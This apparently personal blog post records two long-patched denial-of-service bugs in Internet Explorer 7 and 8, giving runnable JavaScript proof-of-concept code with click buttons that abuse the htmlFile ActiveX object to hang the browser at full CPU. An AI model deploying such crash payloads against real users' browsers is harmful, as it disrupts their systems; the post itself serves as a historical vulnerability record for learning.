DoS — htmlFile with Invalid Protocol and WMP launchURL

Two denial-of-service conditions in IE7 and IE8 triggered through the htmlFile ActiveX object.

<script language="JavaScript">
function bug1()
{
    // Bug 1: navigating an iframe to an invalid protocol causes an infinite busy loop
    ax = new ActiveXObject('htmlFile');
    ax.write('<iframe></iframe><script>window[0].location = "loop://www.google.com"<\/script>');
    ax.close();
}

function bug2()
{
    // Bug 2: WMP launchURL inside an htmlFile document
    ax = new ActiveXObject('htmlFile');
    ax.write('ANYTHING');
    ax.close();
    ax.body.innerHTML =
        '<object id="oWMP" classid="clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6" width="1" height="1"></object>' +
        '<script defer>document.all.oWMP.launchURL("http://www.anywhere.com");<\/script>';
}
</script>
<input type="button" onclick="bug1()" value="TryMe (Bug1)">
<input type="button" onclick="bug2()" value="TryMe (Bug2)">

Both leave the IE process consuming 100% CPU with no recovery path short of killing it. Tested on IE7 and IE8.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Address Bar Spoofing and About:Tabs Exploitation via res:// Domain] :: [DoS — X-Frame-Options Location Navigation Crash] >